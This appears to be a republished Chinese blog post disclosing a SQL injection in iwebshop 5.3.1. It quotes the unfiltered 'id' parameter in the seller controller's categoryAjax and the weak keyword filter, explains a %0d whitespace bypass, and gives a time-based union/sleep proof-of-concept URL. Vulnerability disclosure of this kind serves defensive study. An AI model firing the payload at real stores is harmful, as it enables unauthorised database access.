内容简介:iwebshop最新版存在一个非常弱智的注入漏洞主要导致原因开发者忘记写成
iwebshop 最新版本5.3.1 前台注入
iwebshop最新版存在一个非常弱智的注入漏洞
主要导致原因 $id = IFilter::act(IReq::get('id'));
开发者忘记写成 IFilter::act(IReq::get('id'), 'int')
了,导致直接注入. 在其他文件也存在这个问题.
这个文件需要商家账号才可以访问,是可以注册的
漏洞点 controllers/seller.php
函数 categoryAjax
public function categoryAjax() { $id = IFilter::act(IReq::get('id')); $parent_id = IFilter::act(IReq::get('parent_id')); if($id && is_array($id)) { foreach($id as $category_id) { $childString = goods_class::catChild($category_id);//父类ID不能死循环设置成其子分类 if($parent_id > 0 && stripos(",".$childString.",",",".$parent_id.",") !== false) { die(JSON::encode(array('result' => 'fail'))); } }
直接将id传入到 catChild
public static function catChild($catId,$level = 1) { if($level == 0) { return $catId; } $temp = array(); $result = array($catId); $catDB = new IModel('category'); while(true) { $id = current($result); if(!$id) { break; } $temp = $catDB->query('parent_id = '.$id);
直接将id拼接到 sql 查询中.. 这个cms有一点sql过滤,但是非常弱,也就ctf入门题的水平
lib/core/util/filter_class.php
public static function string($str,$limitLen = false) { $str = trim($str); $str = self::limitLen($str,$limitLen); $str = htmlspecialchars($str,ENT_NOQUOTES); return self::addSlash($str); } public static function word($str) { $word = array("select ","select/*","update ","update/*","delete ","delete/*","insert into","insert/*","updatexml","concat","()","/**/","union("); foreach($word as $val) { if(stripos($str,$val) !== false) { return ''; } } return self::removeEmoji($str); }
不允许 union
加空格,可是空格的代替很多 比如 %0d
poc
/index.php?controller=seller&action=categoryAjax&id[]=1%20and%201=1%20union%0dselect%0d1,2,3,4,5,6,7,8,sleep(5)
以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网
猜你喜欢:
- Angular 4 依赖注入教程之二 组件中注入服务
- 服务端注入之Flask框架中服务端模板注入问题
- 服务器端电子表格注入 - 从公式注入到远程代码执行
- SQL注入测试技巧TIP:再从Mysql注入绕过过滤说起
- 手机抓包+注入黑科技HttpCanary——最强大的Android抓包注入工具
- 三, 跨语言微服务框架 - Istio官方示例(自动注入.请求路由.流量控制.故障注入) 原 荐
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
